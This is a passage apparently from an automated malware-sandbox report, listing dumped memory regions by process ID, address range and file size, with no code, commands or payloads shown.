                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4172-226-0x0000000000DE0000-0x0000000000DE2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4180-239-0x0000000002B92000-0x0000000002B94000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4180-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4180-225-0x0000000002B90000-0x0000000002B92000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4180-242-0x0000000002B95000-0x0000000002B97000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4180-241-0x0000000002B94000-0x0000000002B95000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4192-285-0x00000000054C0000-0x00000000054C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4192-276-0x0000000005880000-0x0000000005881000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4192-283-0x0000000005330000-0x0000000005331000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4192-266-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4192-270-0x0000000000990000-0x0000000000991000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4192-280-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4192-279-0x0000000005290000-0x0000000005291000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4192-281-0x00000000052F0000-0x00000000052F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4192-275-0x0000000002BF0000-0x0000000002BF2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4256-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4256-231-0x0000000000DE0000-0x0000000000DE2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4256-238-0x0000000000DE2000-0x0000000000DE4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4256-244-0x0000000000DE5000-0x0000000000DE6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4336-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4336-235-0x0000000000AB0000-0x0000000000ABD000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              52KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4424-252-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4424-318-0x0000000003570000-0x0000000003580000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4804-246-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4844-261-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/4916-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5024-267-0x0000000000430000-0x00000000004DE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              696KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5024-262-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5024-265-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5032-256-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5032-260-0x0000000002610000-0x0000000002612000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5032-298-0x0000000002614000-0x0000000002615000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5068-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5072-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5084-259-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5180-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5212-297-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5252-333-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5284-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5320-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5348-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5456-322-0x00000000047B0000-0x000000000480C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              368KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5456-320-0x00000000046AA000-0x00000000047AB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                              1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5456-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5456-347-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5472-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5628-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5648-334-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5676-350-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5704-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5708-287-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5860-290-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5892-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5984-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/5996-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6136-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6136-343-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6192-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6212-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6296-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6312-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6340-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6460-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6636-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6648-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6952-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6968-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6988-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/7144-358-0x0000000000402F68-mapping.dmp